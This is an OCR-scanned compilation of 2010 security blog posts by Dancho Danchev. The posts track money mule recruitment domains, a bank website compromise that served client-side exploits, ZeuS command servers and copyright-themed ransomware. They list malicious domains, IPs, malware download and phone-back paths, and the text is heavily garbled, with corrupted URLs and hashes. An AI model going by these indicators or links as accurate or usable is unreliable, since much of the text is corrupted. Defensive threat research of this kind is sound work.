tds-style.spb.ru /error/1.exe. Detection rate: 

- l.exe - [10]Suspicious:W32/Malware!Gemini - Result: 4/42 
(9.53 %) 

Keeping the money mules on a short leash series, are prone 
to expand. Stay tuned! 

Related coverage of money laundering in the context 
of cybercrime: 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[12] Money Mule Recruiters on Yahool's Web Hosting 

[13] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[14] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[15] Keeping Reshipping Mule Recruiters on a Short Leash 


[16] Keeping Money Mule Recruiters on a Short Leash 

[17] Standardizing the Money Mule Recruitment Process 

[ 18]Inside a Money Laundering Group's Spamming 
Operations 

283 

[19] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[20] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [21 ]Dancho Danchev's 
blog. Follow him [22Jon Twitter. 

1. http://ddanchev.blo as pot.com/2010/Q2/dissectin a- 
on a oin a -monev-mule.html 

2. http://cve.mitre.or a/ca i-bin/cvename.c a i?name=CVE- 
2009-1492 

3. htto://cve. mitre.or a/ca i-bi n/cvename.c a i ?name=CVE- 
2007-5659 

4. http://www. a oo a le.com/safebrowsin a /dia a nostic? 
site=http://ceffincfin.com/&hl = en 

5. 

http://www.virustotal.com/analisis/20d56cbab6bfa901d94e5 

d9ce377ae9cbaf4e91ff5a283751d43f3c0ebb44eb5-12698 

80320 


6 . 
























http://www.virustotal.com/analisis/lc9d558dabd32f3900005 

677655424ad8fde813fc71c5dl57653dba953bdf8af-12699 

66639 

7. 

http://www.virustotal.com/analisis/ccl3cf35292fb9ee09c22ff 

fa60bcabd5a6S3fea92f5dd02628735ee81eSfc4c-12699 

66625 

8 . 

http://www.virustotal.com/analisis/4928480e5192213fbbdl4 

C66191b3009bd67226c0bec9b685a878664ea5a5723- 

12699 

66041 

9. 

http://www.virustotal.com/analisis/d8456cafl5ec23243bc8a 

988c792503d90323cl604ced76f90a5e3a941094c0e-12699 

66491 

10 . 

http://www.virustotal.com/analisis/d8456cafl5ec23243bc8a 

988c792503d90323cl604ced76f90a5e3a941094c0e-12699 

66491 

11. http://ddanchev.blo as pot.com/2010/03/keeoin a -mone v- 
mule-recruiters-on-short.html 


12. http://ddanchev.blo as pot.com/2010/03/monev-mule- 
recruiters-on-vahoos-web.html 



























13. http://ddanchev.blo as pot.com/2010/Q2/dissectin a- 
on a oin a -monev-mule.html 


14. http://ddanchev.blo as pot.com/2010/02/keeoin a -mone v- 
mule-recruiters-on-short.html 


15. http://ddanchev.blo as pot.com/20Q9/12/keepin a- 
reshi p pin a -mule-recruiters-on.html 

16. http://ddanchev.blo as pot.com/2009/ll/keepin a -mone v- 
mule-recruiters-on-short.html 


17. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

18. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
launderin a-a roups-soammin a .html 

19. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asoroxs-fast.html 

20. http://ddanchev.blo as pot.com/20Q8/10/monev-mules- 
s vndicate-activelv.html 

21. http://ddanchev.blo as oot.com/ 

22. http://twitter.com/danchodanchev 
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Summarizing Zero Day's Posts for March (2010-04-01 
10:58) 

The following is a brief summary of all of my posts at 
[l]ZDNet's Zero Day for March, 2010. 

You [2]can also go through [3]previous summaries, as well as 
subscribe to my [4]personal RSS feed, [5]Zero 

Day's main feed, or follow me on Twitter: 

Recommended reading - [6]TROYAK-AS: the cybercrime- 
friendly ISP that just won't go away ; [7]The current state of 
the crimeware threat - Q &A and [8]From Russia with 
(objective) spam stats 

01. [9] Pol ice arrest Mariposa botnet masters, 12M+ hosts 
compromised 

02. [10]Vodafone HTC Magic shipped with Conficker, 
Mariposa malware 

03. [lljMac OS X SMS ransomware - hype or real threat? + 
[12]Gallery 

04. [13]TROYAK-AS: the cybercrime-friendly ISP that just 
won't go away 

05. [14]Facebook password reset themed malware campaign 
in the wild 

06. [15]The current state of the crimeware threat - Q &A 
07. [16]From Russia with (objective) spam stats 
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08. [17]Survey: Millions of users open spam emails, click on 
links 

09. [ 18]Trivial security flaw in popular iPhone app leads to 
privacy leak 

10. [19]Report: 64 % of all Microsoft vulnerabilities for 2009 
mitigated by Least Privilege accounts 

This post has been reproduced from [20]Dancho Danchev's 
blog. Follow him [21 Jon Twitter. 

1. http://blo a s.zdnet.com/securit v 

2. http://ddanchev.blo as pot.com/2010/Q3/summarizin a -zero- 
davs- posts-for.html 

3. http://ddanchev.blo as pot.com/2010/02/summarizin g -zero- 
davs- posts-for- anuarv.html 

4. http://updates.zdnet.com/ta a s/dancho-i-danchev.html? 
t=0&s=0&o=l&mode=rss 


5. http://feeds.feedburner.com/zdnet/securit v 

6. http://blo a s.zdnet.com/securit v/? p = 5761 

7. http://blo a s.zdnet.com/securit v/? p = 5797 

8. http://blo a s.zdnet.com/securit v/? p = 5813 

9. http://blo a s.zdnet.com/securit v/? p = 5587 

10. http://blo a s.zdnet.com/securit v/? p=5626 

11. http://blo a s.zdnet.com/securit v/? p=5731 

12. http://content.zdnet.com/2346-12691 22-403883.html 






































13. http://blo a s.zdnet.com/securit v/? p=5761 

14. http://blp a s.zdnet.cam/securit v/? p=5787 

15. http://blp a s.zdnet.cpm/securit v/? p=5797 

16. http://blc a s.zdnet.cpm/securit v/? p=5813 

17. http://blc a s.zdnet.cam/securit v/? p=5889 

18. http://blc a s.zdnet.cam/securit v/? p=5935 

19. http://blp a s.zdnet.cam/securit v/? p=5964 

20. http://ddanchev.blp as ppt.cpm/ 

21. http://twitter.cpm/danchadanchev 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Four (2010-04-09 10:54) 

UPDATED: Saturday, April 10, 2010: Seme cf the mule 
recruitment sites appear tc be interested in semething else, 
rather than recruiting mules - must be the cversupply cf 
pecple unkncwingly participating in the cybercrime 
eccsystem. 

Several cf the demains (far instance ortex-gourpinc.tw and 
augmentgroupinc.tw) are net accepting registratiens, 
instead, but are attempting to trick the visitor into 
downloading and executing a bogus psychological 
test. 

11 Below is a test prepared by professional psychologists and 
is required in order to be considered a competent candidate 


























for the offered position. After successful completion of your 
test, you will be asked to register on our web site. If you are 
not ready to register right away, please wait to take the test 
at a later point. To REGISTER, simply run the test and you will 
be prompted to dick on the "Register Now" button at any 
time and you will be redirected to the login page, without 
having to take the test again. 
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*This test is under development and we are grateful for all 
comments and suggestions." *lf you are having trouble 
running the test and your computer is requesting 
administrative rights, download the test and simply right- 
click on the Test icon and select "Run As Administrator" from 
the menu. 11 

- [ljtestAugmentlnc.exe - Result: 3/38 (7.9 %) - 
Trojan/Win32.Chifrax.gen; Reser.Reputation. 1 

- [2JtestOrtexGroup.exe - Result: 3/39 (7.7 %) - 
Trojan/Win32.Chifrax.gen; Reser.Reputation. 1 

UPDATED: AS34305, EUROACCESS has taken down the IPs 
within their network. The money mule recruiters naturally 
have a contingency plan in place, and have migrated to 
[3JAS38356 - [4]TimeNet (222.35.143.112; 
222.35.143.234; 222.35.143.235; 222.35.143.237) and 
AS21793 GOGAX (76.76.100.2; 76.76.100.4; 
76.76.100.5). 
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Based on the already established patterns of this group, it 
was only a matter of time until they re-introduced yet 
another portfolio of money mule recruitment domains, 
combining them with spamvertised recruitment messages, 

and forum postings. 

Just like their campaign from last month ([5]Keeping 
Money Mule Recruiters on a Short Leash - Part Three) 

the current one is once again interacting exclusively with 
A534305, EUROACCESS Global Autonomous System, 

including the newly introduced name servers. 

What has changed? It's the [6]migration towards the use 
of fast-flux infrastructure for ZeuS crimeware serv¬ 
ing campaigns, and in an isolated incident profiled in this 
post, a money mule recruitment campaign that's also sharing 
the same fast-flux infrastructure. Combined with the 
BIZCN.COM, INC. domain registrar's practice of accepting 
domain registrations using example.com emails, next to 
ignoring domain suspension requests - you end up with the 
perfect safe haven for a cybercrime operation. 

In March, 2010, it took EUROACCESS less then 10 minutes to 
undermine their campaigns, including ones re- 
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siding within the AS of a cyber-crime friendly customer 
known as 193.104.22.0/24 KratosRoute. However, it's 
interesting to observe their return to the same ISP, given that 
they were within a much more cybercrime-friendly 


neighborhood once EUROACCESS kicked them out last 
month. 

Although the take down activities from last month may seem 
to have a short-lived effect, now that they're 

not only back, but are once again abusing EUROACCESS, the 
loss of OPSEC (operational security) did happen, just like it 
happened in the wake of the [7]TROYAK-AS takedown. 

Let's dissect the currently ongoing campaign, and emphasize 
on a second money mule recruitment campaign, 

that's not just using a fast-flux infrastructure, but is also 
connected to hilarykneber@yahoo.com ([8]The Kneber 
botnet - FAQ). 

Spamvertised, and parked domains on 85.12.46.3; 
85.12.46.2; 193.104.106.30 - AS34305, EUROACCESS Global 

Autonomous System are as follows: 
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altitudegroupinc.tw - Email: weds@fastermail.ru 

altitude-groupli.com - Email: mylar@5mx.ru 
altitude-groupmain.tw - Email: gutsy@qx8.ru 
amplitude-groupmain.net - Email: tabs@5mx.ru 
arvina-groupco.tw - Email: hv@qx8.ru 
arvina-groupinc.tw - Email: jerks@5mx.ru 
arvina-groupnet.cc - Email: mat.mat@yahoo.com 



asperity-group.com - Email: okay@qx8.ru 
asperitygroup.net - Email: cde@freenetbox.ru 
asperitygroupinc.tw - Email: ti@fastermail.ru 
asperity-groupmain.tw - Email: gutsy@qx8.ru 
astra-groupnet.tw - Email: logic@qx8.ru 
astra-groupinc.tw - Email: gv@fastermail.ru 
augment-group.com - Email: mylar@5mx.ru 
augmentgroup.net - Email: glean@fastermail.ru 
augmentgroupinc.tw - Email: weds@fastermail.ru 
augment-groupmain.tw - Email: gutsy@qx8.ru 
celerity-groupmain.net - Email: cde@freenetbox.ru 
celerity-groupmain.tw - Email: weds@fastermail.ru 
excel-groupco.tw - Email: thaws@bigmailbox.ru 
excel-groupsvc.com - Email: carlo@qx8.ru 
fincore-groupllc.tw - Email: jerks@5mx.ru 
fecunda-group.com - Email: okay@qx8.ru 
fecundagroupllc.tw - Email: omega@fastermail.ru 
fecunda-groupmain.net - Email: mylar@5mx.ru 
fecunda-groupmain.tw - Email: ti@fastermail.ru 
foreaim-group.com - Email: cde@freenetbox.ru 



foreaimgroup.net - Email: glean@fastermail.ru 
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foreaimgroupinc.tw - Email: gutsy@qx8.ru 
foreaim-groupmain.tw - Email: weds@fastermail.ru 
impact-groupinc.net - Email: cde@freenetbox.ru 
impact-groupnet.com - Email: okay@qx8.ru 
luxor-groupco.tw - Email: logic@qx8.ru 
luxor-groupinc.cc - Email: mat.mat@yahoo.com 
luxor-groupinc.tw - Email: gv@fastermail.ru 
magnet-groupco.tw - Email: gv@fastermail.ru 
magnet-groupinc.cc - Email: mat.mat@yahoo.com 
millennium-groupco.tw - Email: thaws@bigmailbox.ru 
millennium-groupsvc.tw - Email: thaws@bigmailbox.ru 
optimusgroupnet.ee - Email: mat.mat@yahoo.com 
optimus-groupsvc.tw - Email: jerks@5mx.ru 
ortex-gourpinc.tw - Email: clad@bigmailbox.ru 
ortex-groupinc.cc - Email: mat.mat@yahoo.com 
pacer-groupnet.tw - Email: omega@fastermail.ru 
point-groupco.tw - Email: wxy@qx8.ru 


point-groupinc.cc - Email: mat.mat@yahoo.com 
spark-groupco.tw - Email: clad@bigmailbox.ru 
spark-groupsv.tw - Email: clad@bigmailbox.ru 
spark-groupsvc.com - Email: trim@freenetbox.ru 
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synapse-groupfine.net - Email: okay@qx8.ru 

synapse-groupinc.tw - Email: omega@fastermail.ru 

synapsegroupli.com - Email: tabs@5mx.ru 

target-groupinc.cc - Email: mat.mat@yahoo.com 

tnm-group.tw - Email: troop@bigmailbox.ru 

tnmgroupinc.com - Email: tabs@5mx.ru 

tnmgroupsvc.net - Email: tabs@5mx.ru 

starlingbusinessgroup.com - 212.150.164.201 - Email 
tahli@yahoo.com (spamvertised separately from the 
campaign) 

Newly introduced name servers: 

ns3.sandhouse.cc - 74.118.194.82 - Email: 
taunt@freenetbox.ru 

nsl.volcanotime.com (Parked on the same IP is also 

nsl.jockscreamer.net Email: 

free@freenetbox.ru) - 

64.85.174.144 - Email: hs@bigmailbox.ru 



ns2.weathernot.net - (Parked on the same IP is also 
ns2.worldslava.cc Email: fussy@bigmailbox.ru) 
204.12.217.252 

- Email: bowls@5mx.ru 

nsl.uleaveit.com - 64.85.174.146 - Email: plea@qx8.ru 

ns2.pesenlife.net - 204.12.217.254 - Email: erupt@qx8.ru 

ns3.greezly.net - 204.124.182.151 - Email: erupt@qx8.ru 

Name servers known from previous campaigns remain active, 
using AS34305: 

nsl.chinegrowth.cc - 92.63.111.196 - Email: 
duly@fastermail.ru 

nsl.partytimee.cn - 92.63.111.196 - Email: chunk@qx8.ru 

nsl.benjenkinss.cn - 92.63.110.85 - Email: chunk@qx8.ru 

nsl.translatasheep.net - 92.63.111.127 - Email: 
stair@freenetbox.ru 

nsl.bizrestroom.ee - 92.63.110.85 - Email: hook@5mx.ru 

ns2.alwaysexit.com - 85.12.46.2 - Email: 
sob@bigmailbox.ru 

ns2.trythisok.cn - 85.12.46.2 - Emaik: chunk@qx8.ru 

It's been a while, since I came across a money mule 
recruitment campaign using fast-flux infrastructure 

([9]Money Mule Recruiters use ASProx's Fast Fluxing 
Services) that's also currently being used by domains 
registered using the same emails as the original Hilary 
Kneber campaigns ([10]Celebrity-Themed Scareware 



Campaign Abusing DocStoc) from December, 2009, as 
well as related mule recruitment campaigns ([ll]Dissecting 
an Ongoing Money Mule 

Recruitment Campaign) from February, 2010. 
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Moreover, one of the domains sharing the fast-flux 
infrastructure with the money mule recruitment site as- 

apfinancialgroup.com - Email: 

admin@asapfinancialgroup.com, was also profiled in last 
month's "[12]Zeus Crimeware/Client-Side Exploits 
Serving Campaign in the Wild". 
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The following ZeuS crimeware, client-side exploits service, 
and malware phone back C &C domains, all share the same 
fast-flux infrastructure: 

allaboutcOntrol.ee - Email: HilaryKneber@yahoo.com 

[13] agreement52.com - Email: Davenport@example.com 

[14] smotril23.com - Email: smot-smot@yandex.ru - [ 15]C 
&C profiled last month 

jdhyhl230jh.net - Email: None@aol.com 

[16] mabtion.cn - Email: Michell.Gregory2009@yahoo.com 

[17] wooobo.cn - Email: Michell.Gregory2009@yahoo.com 


[18] mmjl3l45lkjbdb.ru - Email: none@none.com 

[19] domainsupp.net - Email: ErnestJBooth@example.com 
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first-shockabsorbers.com - Email: ring.redlink@yandex.ru 
this-all-clean.info - Email: ring.redlink@yandex.ru 

f45rugfj98hj9hjkfrnk.com - Email: holsauto@live.com 

[20] financialdeposit.com - Email: crWright@gmail.com 

connectanalyst.com - Email: Mildred44@gmail.com - NOT 
ACTIVE 

vmnrjiknervir.com - Email: holsauto@live.com - NOT 
ACTIVE 

[21] longtermrelations.com - Email: 
admin@schumachercomeback.com - NOT ACTIVE, 
SUSPENDED 

Name servers of the fast-fluxed domains include: 

nsl.hollwear.com - 87.239.22.240 - Email: 
kymboll@rocketmail.com 

nsl.kentinsert.net - 64.120.135.214 - Email: 
rackmodule@writemail.com 

nsl.dimplemolar.net - 207.126.161.29 - Emaik: 
carruawau@gmail.com 

nsl.megapricelist.net - 66.249.23.63 - Email: 
jobwes@clerk.com 


nsl.bighelpdesk.net - 76.10.203.46 - Email: 
galaxegalaxe@gmail.com 

nsl.linejeans.com - 95.211.86.140 - Email: 
palmatorz@aol.com 

nsl.ceberlin.com - 204.12.210.235 

EUROACCESS have been notified, an updated will be posted 
as soon as they take care of the campaign. 

Related coverage of money laundering in the context 
of cybercrime: 

[22] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[23] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[24] Money Mule Recruiters on Yahool's Web Hosting 

[25] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[26] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[27] Keeping Reshipping Mule Recruiters on a Short Leash 

[28] Keeping Money Mule Recruiters on a Short Leash 

[29] Standardizing the Money Mule Recruitment Process 

[30] lnside a Money Laundering Group's Spamming 
Operations 



[31] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[32] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [33]Dancho Danchev's 
blog. Follow him [34]on Twitter. 
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Dissecting Northwestern Bank's Client-Side Exploits 
Serving Site Compromise (2010-04-12 12:03) 

It's one thing to indirectly target a bank's reputation by 
brand-jacking it for phishing or malware servince purposes, 
and entirely another when the front page of the bank 

(NorthWesternBankOnline.com) itself is embedded with 
an iFrame leading to client-side exploits, to ultimately serve 
a copy of [ljBackdoor.DMSpammer. 

• Go through an assessment of a similar incident from 2007 - 

[2]Bank of India Serving Malware 

This is exactly what happened on Friday, with the front page 
of the [3]Northwestern Bank of Orange City and Sheldon, 
Iowa acting as an infection vector. And although the site is 
now clean, the compromise offers some interesting 

insights into the multitasking on behalf of some of the most 
prolific malware spreaders for Ql, 2010. 

• Go through assessments of their previous 
campaigns: [4]Scareware, Sinowal, Client-Side Exploits 
Serving Spam Campaign in the Wild; [5]AS50215 Troyak-as 
Taken Offline, Zeus C &Cs Drop from 249 to 181; [6]Outlook 

Web Access Themed Spam Campaign Serves Zeus 
Crimeware; [7]Pushdo Serving Crimeware, Client-Side Ex¬ 
ploits and Russian Bride Scams; [8]PhotoArchive 
Crimeware/Client-Side Exploits Serving Campaign in the 
Wild; 

[9]Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild; [10]IRS/PhotoArchive Themed 

Zeus/Client-Side Exploits Serving Campaign in the Wild) 
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How come? The iFrame domain used in the Northwestern 
Bank's campaign, is parked on the very same IP 

(59.53.91.192 - A54134, CHINA-TELECOM China Telecom) 
that is still active, and was profiled in last month's 
spamvertised "[ll]Zeus Crimeware/Client-Side Exploits 
Serving Campaign in the Wild" campaign. 

The iFrame embedded on the front page of Northwestern 
Bank's web site, mumukafes.net /trf/index.php - 

59.53.91.192 - Email: mated@freemailbox.ru, redirects 
through the following directories, to ultimately attempt to 
serve client-side exploits through the copycat Phoenix 
Exploit Kit web malware exploitation kit: 

- mumukafes.net /trf/index.php - 59.53.91.192 - Email: 
mated@freemailbox.ru 

- sobakozgav.net /index.php - 59.53.91.192 

- sobakozgav.net /tmp/newplayer.pdf - CVE-2009-4324 

- sobakozgav.net /l.php?i = 16 

- sobakozgav.net /statistics.php 

Parked on the same IP (59.53.91.192) are also the following 
domains, all of which have been seen serving 

client-side exploits in previous campaigns: 

aaa.fozdegen.com - Email: mated@freemailbox.ru 

bbb.fozdegen.com - Email: mated@freemailbox.ru 


cogs.trfafsegh.com - Email: maple@qx8.ru 
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countrtds.ru - Email: thru@freenetbox.ru 

dogfoog.net - Email: drier@qx8.ru 

eee.fozdegen.com - Email: mated@freemailbox.ru 

fff.sobakozgav.net - Email: mated@freemailbox.ru 

fozdegen.com - Email: mated@freemailbox.ru 

lll.sobakozgav.net - Email: mated@freemailbox.ru 

mumukafes.net - Email: mated@freemailbox.ru 

sobakozgav.net - Email: mated@freemailbox.ru 

trfafsegh.com - Email: maple@qx8.ru 

Moreover, there are also active [12]ZeuS C &Cs on the same 
IP - 59.53.91.192, with the following detection rates for the 
currently active binaries: 

- exel.exe - [13]Trojan/Win32.Zbot.gen; Trojan- 
Spy.Win32.Zbot - Result: 32/38 (84.22 %) 

- exe.exe - [14]Backdoor.DMSpammer - Result: 23/39 (58.97 
%) 

- svhost.exe - [15]Trojan.Win32.Swisyn; 

Trojan.Win32.Swisyn.acfo - Result: 33/38 (86.85 %) 

- vot.exe - [16]Trojan.Spy.ZBot.EOR; TSPY ZBOT.SMG - 
Result: 15/38 (39.48 %) 
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Detection rates for the campaign files obtained through 
Northwestern Bank's client-side exploit serving campaign: 

-js.js - [17]Mal/ObfJS-CT; JS/Crypted.CV.gen - Result: 3/39 
(7.7 %) 

- newplayer.pdf - [18]Exploit.PDF-JS.Gen; 
Exploit:Win32/Pdfjsc.EP - Result: 22/39 (56.42 %) 

- update.exe - [19]Backdoor.DMSpammer - Result: 24/39 
(61.54 %) 

The sampled update.exe phones back to the following 
locations: 

usrdomainn.net /n2/checkupdate.txt - 122.70.149.12, 
AS38356, TimeNet - Email: paulapruynel3@gmail.com 

usrdomainn.net /n2/tuktuk.php 

usrdomainn.net /n2/getemails.php 

usrdomainnertwesar.net /n2/getemails.php 

usrdomainnertwesar.net /n2/checkupdate.txt 

usrdomainnertwesar.net /n2/tuktuk.php 

A538356, TimeNet is most recently seen in the migration of 
the money mule recruiters 11 [20]Keeping Money Mule 
Recruiters on a Short Leash - Part Four ", with 
tuktuk.php literally translated as herehere.php. 

The site is now clean, however, the iFrame domains and ZeuS 
C &Cs remain active. 



This post has been reproduced from [21 ]Dancho Danchev's 
blog. Follow him [22Jon Twitter. 

1. http://www.svmantec.com/securitv response/writeu p.isp? 
docid = 2003-102911-0033-99 

2. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

3. http://sunbeltblo a .blo as pot.com/2010/04/f1orida-bank- 
compromised-servin a .html 

4. http://ddanchev.blo as pot.com/2010/Q3/scareware-sinowal- 
ciient-side-exoloits.html 

5. http://ddanchev.blo as pot.com/2010/03/as5Q215-trovak- 
as-taken-offline-zeus-c.html 

6. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-soam-camoai a n.html 

7. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
crimeware-client-side.html 


8. http://ddanchev.blo as pot.com/2010/Q2/photoarchive- 
crimewareclient-side.html 


9. http://ddanchev.blo as pot.com/2010/Q2/tax-report-themed- 
zeusclient-side.html 


10. http://ddanchev.blo as pot.com/2010/Q2/irsphotoarchive- 
themed-zeusclient-side.html 


11. http://ddanchev.blo as pot.com/2010/Q3/zeus- 
crimewareclient-side-exploits.html 


12. https://zeustracker.abuse.ch/monitor. php? 
i paddress= 59.53.91.192 



















































13. 

http://www.vi rustotal.com/analisis/38a320d9c28c427acl2 09 

2b60040756fe9d0b4def6461493e4bc52a0488226f0-12710 

14015 

14. 

http://www.virustotal.com/analisis/b73ef467fcldafl2d3624c 

Iffblal0090dbfdbffl34d63598fbll0cldd8f9cf5-12710 

14031 

15. 

http://www.virustotal.com/analisis/8a59eal0462a2b5c054d5 

36ff9ab2e9el7fa862ce5alc840c90865b9461cle0a-12710 

14059 

16. 

http://www.virustotal.com/analisis/dl613734c2ef041316f26 

5942a5bc2de8bafd6765763f56cbd61f3f9b5022d35-12710 

17419 

17. 

http://www.virustotal.com/analisis/d273801bl4025db06797 

b!138a72ce75fa0a2a94e519de3fbd399bld686fa864-12710 
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http://www.virustotal.com/analisis/5b714bc0f68c58fbb5a35b 
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13864 

19. 

http://www.virustotal.com/analisis/b73ef467fcldafl2d3624c 
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13883 


20. http://ddanchev.blo as pot.com/2010/04/keeoin a -mone v- 
mule-recruiters-on-short.html 


21. http://ddanchev.blo as oot.com/ 
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Copyright Violation Alert Themed Ransomware in the 
Wild (2010-04-12 19:51) 

The copyright violation alert themed ransomware campaign ( 

[1] Copyright violation alert ransomware in the wild; 

[2] ICPP Copyright Foundation is Fake ) is not just a 
novel approach for extortion of the highest amount of money 
seen in ransomware variants so far, but also, offers 
interesting clues into the multitasking mentality of the 
cybercriminals whose campaigns have already been profiled. 

The bogus ICPP Foundation (icpp-online.com - 
193.33.114.77 - Email: ovenersbox@yahoo.com) describes it¬ 
self as: 

" We are a law firm which specialises in assisting intellectual 
property rights holders exploit and enforce their rights 
globally. Illegal file sharing costs the creative industries 











billions of pounds every year. The impact of this is huge, 
resulting in job losses, declining profit margins and reduced 
investment in product development. Action needs to be 
taken and we believe a coordinated effort is needed now, 
before irreparable damage is done. 

We have developed effective and unique methods for 
organisations to enforce their intellectual rights. By working 
effectively with forensic IT experts, law firms and anti-pi racy 
organisations, we seek to eliminate the illegal distri-304 




bution of copyrighted material through our revolutionary 
business model. Whilst many companies offer anti-piracy 
measures, these are often costly and ineffective. Our 
approach is quite the opposite, it generates revenue for 
rights holders and effectively decreases copyright 
infringement in a measurable and sustainable way. We offer 
high quality advice and excellent client care by delivering a 
thorough and reliable service. If you are interested in our 
services, please contact us for a no obligation consultation. " 

[3]Responding to the same IP (193.33.114.77) are also: 

green-stat.com - Email: tahii@yahoo.com 

media-magnats.com - Email: tahli@yahoo.com 

Where do we know the tahli@yahoo.com email from? From 

the "[4]The Koobface Gang Wishes the industry 

"Happy Holidays" where it was used to register Zeus C &Cs 
as well as money mule recruitment domains, from the 

"[5]Money Mule Recruitment Campaign Serving Client- 
Side Exploits" where it was used to register the client-side 
exploit serving mule recruitment site, and most recently 


from "[6]Keeping Money Mule Recruiters on a Short 
Leash 

- Part Four'' used in another mule recruitment site 
registration. 

What's particularly interesting about the ransomware 
variant, is the fact that it has been localized to the following 
languages: Czech, Danish, Dutch, English, French, German, 
Italian, Portuguese, Slovak and Spanish, as well as the fact 
that it will attempt to build its torrents list from actual torrent 
files it is able to locate within the victim's hard drive. 

Detection rates, for the ransomware: 

- mm.exe - [7]Win32/Adware.Antipiracy - Result: 2/39 (5.13 
%) 

- iqmanager.exe - [8]Rogue:W32/DotTorrent.A - Result: 5/39 
(12.83 %) 

- uninstall.exe - [9]Reser.Reputation.l - Result: 1/39 (2.5/ 
%) 

Upon execution, the sample phones back to 
91.209.238.2/m5install/774/l (AS486/1, GROZA-AS 
Cyber Inter¬ 
net Bunker) with the actual affiliate ID " a fid=774" found in 
the settings.ini file. Active on the same IP are also related 
phone back directories, from different campaigns" 

91.209.238.2/r2ne winstall/freemen/1 
91.209.238.2/r2ne winstall/02937/1 


91.209.238.2/r2 hit/7/0/0 



This is perhaps the first recorded case of cybercriminals 
ignoring the basics of micro-payments, and emphasiz¬ 
ing on profit margins by attempting to extort the amount of 
$400. 

Related ransomware posts: 

[10]Mac OS X SMS ransomware - hype or real threat? 

305 

[11 ]iHacked: jail broken iPhones compromised, $5 ransom 
demanded 

[12] New LoroBot ransomware encrypts files, demands $100 
for decryption 

[13] New ransomware locks PCs, demands premium SMS for 
removal 

[14] Scareware meets ransomware: "Buy our fake product 
and we'll decrypt the files " 

[15] Who's behind the GPcode ransomware? 

[16] How to recover GPcode encrypted files? 

[17JSMS Ransomware Displays Persistent Inline Ads 
[18JSMS Ransomware Source Code Now Offered for Sale 

[19] 3rd SMS Ransomware Variant Offered for Sale 

[20] 4th SMS Ransomware Variant Offered for Sale 

[21] 5th SMS Ransomware Variant Offered for Sale 

[22] 6th SMS Ransomware Variant Offered for Sale 



This post has been reproduced from [23]Dancho Danchev's 
blog. Follow him [24]on Twitter. 
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Copyright Violation Alert Themed Ransomware in the 
Wild (2010-04-12 19:51) 

UPDATED: Wednesday, April 28, 2010: The universal 
license code required in the " Enter a previously purchased 
license code" window is RFHM2-TPX47-YD6RT-H4KDM 

The copyright violation alert themed ransomware campaign ( 

[lJCopyright violation alert ransomware in the 

wild; [2JICPP Copyright Foundation is Fake ) is not just a 
novel approach for extortion of the highest amount of money 
seen in ransomware variants so far, but also, offers 
interesting clues into the multitasking mentality of the 
cybercriminals whose campaigns have already been profiled. 

The bogus ICPP Foundation (icpp-online.com - 
193.33.114.77 - Email: ovenersbox@yahoo.com) describes it¬ 
self as: 

" We are a law firm which specialises in assisting intellectual 
property rights holders exploit and enforce their rights 
globally. Illegal file sharing costs the creative industries 
billions of pounds every year. The impact of this is huge, 
resulting in job losses, declining profit margins and reduced 
investment in product development. Action needs to be 
taken and we believe a coordinated effort is needed now, 
before irreparable damage is done. 
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1/1/e have developed effective and unique methods for 
organisations to enforce their intellectual rights. By working 
effectively with forensic IT experts, law firms and anti-piracy 
organisations, we seek to eliminate the illegal distribution of 
copyrighted material through our revolutionary business 
model. Whilst many companies offer anti-piracy measures, 
these are often costly and ineffective. Our approach is quite 
the opposite, it generates revenue for rights holders and 
effectively decreases copyright infringement in a measurable 
and sustainable way. We offer high quality advice and 
excellent client care by delivering a thorough and reliable 
service. If you are interested in our services, please contact 
us for a no obligation consultation. " 

[3]Responding to the same IP (193.33.114.77) are also: 

green-stat.com - Email: tahii@yahoo.com 

media-magnats.com - Email: tahli@yahoo.com 

Where do we know the tahli@yahoo.com email from? From 

the "[4]The Koobface Gang Wishes the industry 

"Happy Holidays" where it was used to register Zeus C &Cs 
as well as money mule recruitment domains, from the 

"[5]Money Mule Recruitment Campaign Serving Client- 
Side Exploits" where it was used to register the client-side 
exploit serving mule recruitment site, and most recently 
from "[6]Keeping Money Mule Recruiters on a Short 
Leash 

- Part Four" used in another mule recruitment site 
registration. 

What's particularly interesting about the ransomware 
variant, is the fact that it has been localized to the following 



languages: Czech, Danish, Dutch, English, French, German, 
Italian, Portuguese, Slovak and Spanish, as well as the fact 
that it will attempt to build its torrents list from actual torrent 
files it is able to locate within the victim's hard drive. 

Detection rates, for the ransomware: 

- mm.exe - [7]Win32/Adware.Antipiracy - Result: 2/39 (5.13 
%) 

- iqmanager.exe - [8]Rogue:W32/DotTorrent.A - Result: 5/39 
(12.83 %) 

- uninstall.exe - [9]Reser.Reputation.l - Result: 1/39 (2.57 
%) 

Upon execution, the sample phones back to 
91.209.238.2/m5install/774/l (AS48671, GROZA-AS 
Cyber Inter¬ 
net Bunker) with the actual affiliate ID " afid=774" found in 
the settings.ini file. Active on the same IP are also related 
phone back directories, from different campaigns" 

91.209.238.2/r2ne winstall/freemen/1 
91.209.238.2/r2ne winstall/02937/1 
91.209.238.2/r2 hit/7/0/0 

This is perhaps the first recorded case of cybercriminals 
ignoring the basics of micro-payments, and emphasiz¬ 
ing on profit margins by attempting to extort the amount of 
$400. 
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Related ransomware posts: 

[10]Mac OS X SMS ransomware - hype or real threat? 

[11 ]iHacked: jail broken iPhones compromised, $5 ransom 
demanded 

[12] New LoroBot ransomware encrypts files, demands $100 
for decryption 

